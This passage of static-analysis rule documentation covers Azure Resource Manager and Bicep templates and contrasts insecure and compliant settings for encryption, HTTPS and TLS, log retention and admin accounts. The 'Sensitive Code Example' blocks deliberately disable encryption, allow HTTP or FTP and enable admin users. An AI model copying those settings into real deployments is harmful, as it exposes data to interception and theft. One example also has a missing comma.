    {
      "type": "Microsoft.SqlVirtualMachine/sqlVirtualMachines",
      "apiVersion": "2022-08-01-preview",
      "properties": {
        "autoBackupSettings": {
          "enableEncryption": false
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts:

Disabled enforcing of infrastructure encryption for double encryption of data:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "encryption": {
          "requireInfrastructureEncryption": false
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts/encryptionScopes:

Disabled enforcing of infrastructure encryption for double encryption of data at encryption scope level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts/encryptionScopes",
      "apiVersion": "2022-09-01",
      "properties": {
        "requireInfrastructureEncryption": false
      }
    }
  ]
}

Compliant Solution

For Microsoft.AzureArcData/sqlServerInstances/databases:

Enabled encryption on SQL service instance database:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.AzureArcData/sqlServerInstances/databases",
      "apiVersion": "2023-03-15-preview",
      "properties": {
        "databaseOptions": {
          "isEncrypted": true
        }
      }
    }
  ]
}

For Microsoft.Compute/disks:

Enabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryption": {
          "diskEncryptionSetId": "string",
          "type": "string"
        }
      }
    }
  ]
}

Enabled encryption through setting encryptionSettingsCollection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": true,
          "encryptionSettings": [
            {
              "diskEncryptionKey": {
                "secretUrl": "string",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption through a security profile for an OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "securityProfile": {
          "secureVMDiskEncryptionSetId": "string",
          "securityType": "{'ConfidentialVM_DiskEncryptedWithCustomerKey' | 'ConfidentialVM_DiskEncryptedWithPlatformKey' | 'ConfidentialVM_VMGuestStateOnlyEncryptedWithPlatformKey' | 'TrustedLaunch'}"
        }
      }
    }
  ]
}

For Microsoft.Compute/snapshots:

Enabled disk encryption for snapshot:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryption": {
          "diskEncryptionSetId": "string",
          "type": "{'EncryptionAtRestWithCustomerKey' | 'EncryptionAtRestWithPlatformAndCustomerKeys' | 'EncryptionAtRestWithPlatformKey'}"
        }
      }
    }
  ]
}

Enabled disk encryption with settings collection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": true,
          "encryptionSettings": [
            {
              "diskEncryptionKey": {
                "secretUrl": "",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          ],
          "encryptionSettingsVersion": "{'1.0' | '1.1'}"
        }
      }
    }
  ]
}

Enabled disk encryption through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "securityProfile": {
          "secureVMDiskEncryptionSetId": "string",
          "securityType": "{'ConfidentialVM_DiskEncryptedWithCustomerKey' | 'ConfidentialVM_DiskEncryptedWithPlatformKey' | 'ConfidentialVM_VMGuestStateOnlyEncryptedWithPlatformKey' |'TrustedLaunch'}"
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachines:

Enabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "securityProfile": {
          "encryptionAtHost": true
        }
      }
    }
  ]
}

Enabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId",
              "managedDisk": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for managed disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId",
              "managedDisk": {
                "securityProfile": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "encryptionSettings": {
              "enabled": true,
              "diskEncryptionKey": {
                "secretUrl": "string",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "id": "myDiskId",
              "diskEncryptionSet": {
                "id": "string"
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS managed disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "securityProfile": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachineScaleSets:

Enabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "securityProfile": {
            "encryptionAtHost": true
          }
        }
      }
    }
  ]
}

Enabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk",
                "managedDisk": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            ]
          }
        }
      }
    }
  ]
}

Enabled encryption for data disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk",
                "managedDisk": {
                  "securityProfile": {
                    "diskEncryptionSet": {
                      "id": "string"
                    }
                  }
                }
              }
            ]
          }
        }
      }
    }
  ]
}

Enabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk",
              "managedDisk": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk",
              "managedDisk": {
                "securityProfile": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            }
          }
        }
      }
    }
  ]
}

For Microsoft.ContainerService/managedClusters:

Enabled encryption at host and set the disk encryption set ID:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-02-preview",
      "properties": {
        "agentPoolProfiles": [
          {
            "enableEncryptionAtHost": true
          }
        ]
        "diskEncryptionSetID": "string"
      }
    }
  ]
}

For Microsoft.DataLakeStore/accounts:

Enabled encryption for Data Lake Store:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataLakeStore/accounts",
      "apiVersion": "2016-11-01",
      "properties": {
        "encryptionState": "Enabled"
      }
    }
  ]
}

For Microsoft.DBforMySQL/servers:

Enabled infrastructure double encryption for MySQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Enabled"
      }
    }
  ]
}

For Microsoft.DBforPostgreSQL/servers:

Enabled infrastructure double encryption for PostgreSQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforPostgreSQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Enabled"
      }
    }
  ]
}

For Microsoft.DocumentDB/cassandraClusters/dataCenters:

Enabled encryption for a Cassandra Cluster datacenter’s managed disk and backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters/dataCenters",
      "apiVersion": "2023-04-15",
      "properties": {
        "diskCapacity": 4,
        "backupStorageCustomerKeyUri": "string",
        "managedDiskCustomerKeyUri": "string"
      }
    }
  ]
}

For Microsoft.HDInsight/clusters:

Enabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": true
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for data disk at application level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters/applications",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": true
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for resource disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "diskEncryptionProperties": {
          "encryptionAtHost": true
        }
      }
    }
  ]
}

For Microsoft.Kusto/clusters:

Enabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Kusto/clusters",
      "apiVersion": "2022-12-29",
      "properties": {
        "enableDiskEncryption": true
      }
    }
  ]
}

For Microsoft.RecoveryServices/vaults:

Enabled encryption on infrastructure:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryption": {
          "infrastructureEncryption": "Enabled"
        }
      }
    }
  ]
}

Enabled encryption on infastructure for backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults/backupEncryptionConfigs",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryptionAtRestType": "{'CustomerManaged' | 'MicrosoftManaged'}",
        "infrastructureEncryptionState": "Enabled"
      }
    }
  ]
}

For Microsoft.RedHatOpenShift/openShiftClusters:

Enabled disk encryption for master profile and worker profiles:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RedHatOpenShift/openShiftClusters",
      "apiVersion": "2022-09-04",
      "properties": {
        "masterProfile": {
          "diskEncryptionSetId": "string",
          "encryptionAtHost": "Enabled"
        },
        "workerProfiles": [
          {
            "diskEncryptionSetId": "string",
            "encryptionAtHost": "Enabled"
          }
        ]
      }
    }
  ]
}

For Microsoft.SqlVirtualMachine/sqlVirtualMachines:

Enabled encryption for SQL Virtual Machine:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SqlVirtualMachine/sqlVirtualMachines",
      "apiVersion": "2022-08-01-preview",
      "properties": {
        "autoBackupSettings": {
          "enableEncryption": true,
          "password": "string"
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts:

Enabled enforcing of infrastructure encryption for double encryption of data:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "encryption": {
          "requireInfrastructureEncryption": true
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts/encryptionScopes:

Enabled enforcing of infrastructure encryption for double encryption of data at encryption scope level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts/encryptionScopes",
      "apiVersion": "2022-09-01",
      "properties": {
        "requireInfrastructureEncryption": true
      }
    }
  ]
}

See

azureresourcemanager:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against tampering or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

For Microsoft.Web/sites:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-09-01",
      "properties": {
        "httpsOnly": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites@2022-03-01' = {
  properties: {
    httpsOnly: false // Sensitive
  }
}

For Microsoft.Web/sites/config:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-09-01",
      "properties": {
        "ftpsState": "AllAllowed"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites/config@2022-09-01' = {
  properties: {
    ftpsState: 'AllAllowed' // Sensitive
  }
}

For Microsoft.Storage/storageAccounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "supportsHttpsTrafficOnly": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  properties: {
    supportsHttpsTrafficOnly: false // Sensitive
  }
}

For Microsoft.ApiManagement/service/apis:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ApiManagement/service/apis",
      "apiVersion": "2022-08-01",
      "properties": {
        "protocols": ["http"]
      }
    }
  ]
}
resource symbolicname 'Microsoft.ApiManagement/service/apis@2022-08-01' = {
  properties: {
    protocols: ['http'] // Sensitive
  }
}

For Microsoft.Cdn/profiles/endpoints:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cdn/profiles/endpoints",
      "apiVersion": "2021-06-01",
      "properties": {
        "isHttpAllowed": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cdn/profiles/endpoints@2021-06-01' = {
  properties: {
    isHttpAllowed: true // Sensitive
  }
}

For Microsoft.Cache/redisEnterprise/databases:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cache/redisEnterprise/databases",
      "apiVersion": "2022-01-01",
      "properties": {
        "clientProtocol": "Plaintext"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cache/redisEnterprise/databases@2022-01-01' = {
  properties: {
    clientProtocol: "Plaintext" // Sensitive
  }
}

For Microsoft.DBforMySQL/servers, Microsoft.DBforMariaDB/servers, and Microsoft.DBforPostgreSQL/servers:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "sslEnforcement": "Disabled"
      }
    }
  ]
}
resource symbolicname 'Microsoft.DBforMySQL/servers@2017-12-01' = {
  properties: {
    sslEnforcement: "Disabled" // Sensitive
  }
}

Compliant Solution

For Microsoft.Web/sites:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites",
      "apiVersion": "2022-09-01",
      "properties": {
        "httpsOnly": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites@2022-03-01' = {
  properties: {
    httpsOnly: true
  }
}

For Microsoft.Web/sites/config:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Web/sites/config",
      "apiVersion": "2022-09-01",
      "properties": {
        "ftpsState": "FtpsOnly"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Web/sites/config@2022-09-01' = {
  properties: {
    ftpsState: 'FtpsOnly'
  }
}

For Microsoft.Storage/storageAccounts:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "supportsHttpsTrafficOnly": true
      }
    }
  ]
}
resource symbolicname 'Microsoft.Storage/storageAccounts@2022-09-01' = {
  properties: {
    supportsHttpsTrafficOnly: true
  }
}

For Microsoft.ApiManagement/service/apis:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ApiManagement/service/apis",
      "apiVersion": "2022-08-01",
      "properties": {
        "protocols": ["https"]
      }
    }
  ]
}
resource symbolicname 'Microsoft.ApiManagement/service/apis@2022-08-01' = {
  properties: {
    protocols: ['https']
  }
}

For Microsoft.Cdn/profiles/endpoints:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cdn/profiles/endpoints",
      "apiVersion": "2021-06-01",
      "properties": {
        "isHttpAllowed": false
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cdn/profiles/endpoints@2021-06-01' = {
  properties: {
    isHttpAllowed: false
  }
}

For Microsoft.Cache/redisEnterprise/databases:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Cache/redisEnterprise/databases",
      "apiVersion": "2022-01-01",
      "properties": {
        "clientProtocol": "Encrypted"
      }
    }
  ]
}
resource symbolicname 'Microsoft.Cache/redisEnterprise/databases@2022-01-01' = {
  properties: {
    clientProtocol: "Encrypted"
  }
}

For Microsoft.DBforMySQL/servers, Microsoft.DBforMariaDB/servers, and Microsoft.DBforPostgreSQL/servers:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "sslEnforcement": "Enabled"
      }
    }
  ]
}
resource symbolicname 'Microsoft.DBforMySQL/servers@2017-12-01' = {
  properties: {
    sslEnforcement: "Enabled"
  }
}

See

azureresourcemanager:S6413

Defining a short log retention duration can reduce an organization’s ability to backtrace the actions of malicious actors in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require traceability for a longer duration.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Setting log retention period to 14 days is the bare minimum. It’s recommended to increase it to 30 days or above.

Sensitive Code Example

For Azure Firewall Policy:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/firewallPolicies",
      "apiVersion": "2022-07-01",
      "properties": {
        "insights": {
          "isEnabled": true,
          "retentionDays": 7
        }
      }
    }
  ]
}
resource firewallPolicy 'Microsoft.Network/firewallPolicies@2022-07-01' = {
  properties: {
    insights: {
      isEnabled: true
      retentionDays: 7  // Sensitive
    }
  }
}

Raise issue when retentionDays is smaller than 14, but not 0 (zero), or if isEnabled is false or the insights block is missing.

For Microsoft Network Network Watchers Flow Logs:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/networkWatchers/flowLogs",
      "apiVersion": "2022-07-01",
      "properties": {
        "retentionPolicy": {
          "days": 7,
          "enabled": true
        }
      }
    }
  ]
}
resource networkWatchersFlowLogs 'Microsoft.Network/networkWatchers/flowLogs@2022-07-01' = {
  properties: {
    retentionPolicy: {
      days: 7
      enabled: true
    }
  }
}

Raise issue when days is smaller than 14, but not 0 (zero), or if enabled is set to false or retentionPolicy is missing.

For Microsoft SQL Servers Auditing Settings:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/auditingSettings",
      "apiVersion": "2021-11-01",
      "properties": {
        "retentionDays": 7
      }
    }
  ]
}
resource sqlServerAudit 'Microsoft.Sql/servers/auditingSettings@2021-11-01' = {
  properties: {
    retentionDays: 7    // Sensitive
  }
}

Raise issue when retentionDays is smaller than 14, but not 0 (zero).

The same case applies to other types (when type field is set to one of following):

Compliant Solution

For Azure Firewall Policy:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/firewallPolicies",
      "apiVersion": "2022-07-01",
      "properties": {
        "insights": {
          "isEnabled": true,
          "retentionDays": 30
        }
      }
    }
  ]
}
resource firewallPolicy 'Microsoft.Network/firewallPolicies@2022-07-01' = {
  properties: {
    insights: {
      isEnabled: true
      retentionDays: 30  // Compliant
    }
  }
}

For Microsoft Network Network Watchers Flow Logs:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Network/networkWatchers/flowLogs",
      "apiVersion": "2022-07-01",
      "properties": {
        "retentionPolicy": {
          "days": 30,
          "enabled": true
        }
      }
    }
  ]
}
resource networkWatchersFlowLogs 'Microsoft.Network/networkWatchers/flowLogs@2022-07-01' = {
  properties: {
    retentionPolicy: {
      days: 30      // Compliant
      enabled: true
    }
  }
}

For Microsoft SQL Servers Auditing Settings:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Sql/servers/auditingSettings",
      "apiVersion": "2021-11-01",
      "properties": {
        "retentionDays": 30
      }
    }
  ]
}
resource sqlServerAudit 'Microsoft.Sql/servers/auditingSettings@2021-11-01' = {
  properties: {
    retentionDays: 30    // Compliant
  }
}

Above code also applies to other types defined in previous paragraph.

azureresourcemanager:S6379

Enabling Azure resource-specific admin accounts can reduce an organization’s ability to protect itself against account or service account thefts.

Full Administrator permissions fail to correctly separate duties and create potentially critical attack vectors on the impacted resources.

In case of abuse of elevated permissions, both the data on which impacted resources operate and their access traceability are at risk.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require this resource to disable its administrative accounts or permissions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable the administrative accounts or permissions in this Azure resource.

Sensitive Code Example

For Azure Batch Pools:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.Batch/batchAccounts/pools",
            "apiVersion": "2022-10-01",
            "properties": {
                "startTask": {
                    "userIdentity": {
                        "autoUser": {
                            "elevationLevel": "Admin"
                        }
                    }
                }
            }
        }
    ]
}
resource AdminBatchPool 'Microsoft.Batch/batchAccounts/pools@2022-10-01' = {
  properties: {
    startTask: {
      userIdentity: {
        autoUser: {
          elevationLevel: 'Admin' // Noncompliant
        }
      }
    }
  }
}

For Azure Container Registries:

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ContainerRegistry/registries",
            "apiVersion": "2023-01-01-preview",
            "properties": {
                "adminUserEnabled": true
            }
        }
    ]
}
